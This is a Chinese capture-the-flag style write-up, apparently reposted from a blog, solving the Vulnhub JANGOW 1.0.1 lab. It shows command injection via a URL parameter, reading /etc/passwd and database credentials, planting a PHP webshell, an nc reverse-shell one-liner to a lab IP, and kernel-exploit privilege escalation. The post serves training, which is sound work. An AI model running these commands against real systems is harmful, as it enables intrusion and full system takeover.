码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Vulnhub系列靶机---JANGOW 1.0.1


    文章目录

        • 网卡配置
        • 信息收集
          • 主机发现
          • 端口扫描
        • 漏洞利用
          • 反弹Shell
          • 提权

    靶机文档:JANGOW 1.0.1

    下载地址:Download (Mirror)

    难易程度:.

    image-20230920144550613

    网卡配置

    水果味儿

    信息收集

    主机发现

    image-20230920152630055

    端口扫描

    image-20230920201852054

    访问80端口

    image-20230920202810203

    点击site目录

    image-20230920203029833

    点击页面上方的一个选项,发现Buscar的页面空白,而且地址栏的url看着可以输入一些东西

    http://192.168.8.16/site/busque.php?buscar=
    
    • 1

    image-20230920204302463

    在?buscar=后面加上pwd,显示了当前路径

    /site/busque.php?buscar=pwd

    image-20230920204401670

    /site/busque.php?buscar=cat%20/etc/passwd

    image-20230920204425345

    /site/busque.php?buscar=ls%20-a 发现了wordpress

    image-20230920204650712

    查看wordpress里都有什么文件 ls wordpress
    image-20230920204754415

    查看cat%20wordpress/config.php,页面空白,需要查看页面源代码

    image-20230920204902308

    发现了数据库配置

    $database = "desafio02";
    $username = "desafio02";
    $password = "abygurl69";
    
    • 1
    • 2
    • 3

    漏洞利用

    使用命令执行,写入一句话木马

    echo ' >6868.php
    
    • 1

    image-20230920205153573

    使用蚁剑连接一句话,拿到webshell

    image-20230920205655894

    跟site目录同级下,有一个隐藏的.backup文件

    image-20230920205923383

    $database = "jangow01";
    $username = "jangow01";
    $password = "abygurl69";
    
    • 1
    • 2
    • 3

    image-20230920205820248

    拿到webshell权限极低,啥也干不了

    反弹Shell

    查看攻略,该网站限制了一些端口,只能通过443端口进行访问

    /etc/ufw/applications.d/
    
    • 1

    image-20230920213735426

    查看apache2-utils.ufw.profile文件

    image-20230920213857882

    上传木马

     system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.8 443 >/tmp/f');?>
    
    • 1

    image-20230920214035452

    kali监听443端口

    访问该木马文件

    image-20230920215215714

    成功反弹到

    image-20230920215227513

    提权

    交换shell

    python3 -c "import pty;pty.spawn('/bin/bash')"
    
    • 1

    查看内核版本

    在这里插入图片描述

    搜索相关漏洞

    searchsploit ubuntu 4.4.0-31
    
    • 1

    image-20230920215601443

    searchsploit  -p linux/local/45010.c
    
    • 1

    image-20230920215621804

    将45010.c上传的靶机

    我先发送到我本机,然后本机上传到蚁剑上

    image-20230920215827476

    image-20230920215934955

    赋予可执行权限,然后进行编译

    image-20230920220121864

    上传一个a.out文件,执行它

    image-20230920220221251

    切到/root目录下

    image-20230920220243197

  • 相关阅读:
    20_ue4实现键盘控制物体自转(蓝图通讯2)
    go NewTicker 得使用
    社区动态——恭喜海豚调度中国区用户组新晋 9 枚“社群管理员”
    代码随想录算法训练营第五十六天|1143.最长公共子序列、1035.不相交的线、53. 最大子序和
    亚马逊AI编程助手CodeWhisperer
    element form中input使用@keyup.enter.native回车页面刷新问题
    在Docker跑通Flink分布式版本的WordCount
    【mongodb】--自定义排序规则
    JavaScript WebGL 三维相关概念
    Git 的基本概念和使用方式
  • 原文地址:https://blog.csdn.net/ZhaoSong_/article/details/133197586
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号